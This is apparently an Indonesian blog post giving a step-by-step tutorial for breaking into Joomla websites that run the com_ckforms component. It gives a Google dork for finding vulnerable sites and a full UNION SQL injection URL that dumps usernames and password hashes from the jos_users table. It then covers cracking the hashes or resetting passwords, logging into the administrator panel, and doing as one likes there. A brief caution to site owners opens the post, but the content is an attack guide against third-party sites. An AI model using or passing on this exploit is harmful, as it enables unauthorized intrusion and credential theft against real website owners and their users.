Dalam membuat sebuah website, khususnya CMS Joomla, Anda sebaiknya berhati-hati dalam menginstall Komponen, Modul, Plugin maupun Template. Karena dengan adanya bugs di komponen tersebut, hacker bisa mendapatkan username / password dengan cara meng-exploit. Contohnya komponen com_ckforms.
Dengan komponen ini Anda bisa mendapatkan username dan password dengan mudah. Tentu saja tidak luput dari bantuan sang mesin pencari, seperti Google search engine, yahoo, dan mesin pencari lainnya.
Okay, langsung saja tutorialnya :
- Pertama cari dulu website yang memakai komponen com_ckforms (cari dengan menggunakan seacrh engine dengan dork : inurl:"com_ckforms")
- Jika sudah ketemu, buka alamat websitenya. Yakinkan bahwa website tersebut masih berfungsi
- Copy kode :
index.php?option=com_ckforms&controller=ckdata&view=ckformsdata&layout=detail&task=detail&fid=-2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15*****************************,group_concat(username,0x3a,password)UAH,35+from+jos_users--
- Letakkan setelah namawebsite
- Cek apakah udah keluar username dan passwordnya (bisa dipecahkan dengan MD5 / dengan reset password)
- Jika sudah ada, buka halaman admininstratornya, biasanya alamatnya adalah : namawebsite/administrator => jika belum terpasang komponen jscure, karena dengan komponen jscure dapat merubah alamat administrator dengan menambahkan kode misalnya namawebsite.com/administrator/?kode
- jika berhasil, selamat anda telah menjadi admin
- Silahkan lakukan sesuka Anda,,,
ShoutMix chat widget
0 komentar:
Post a Comment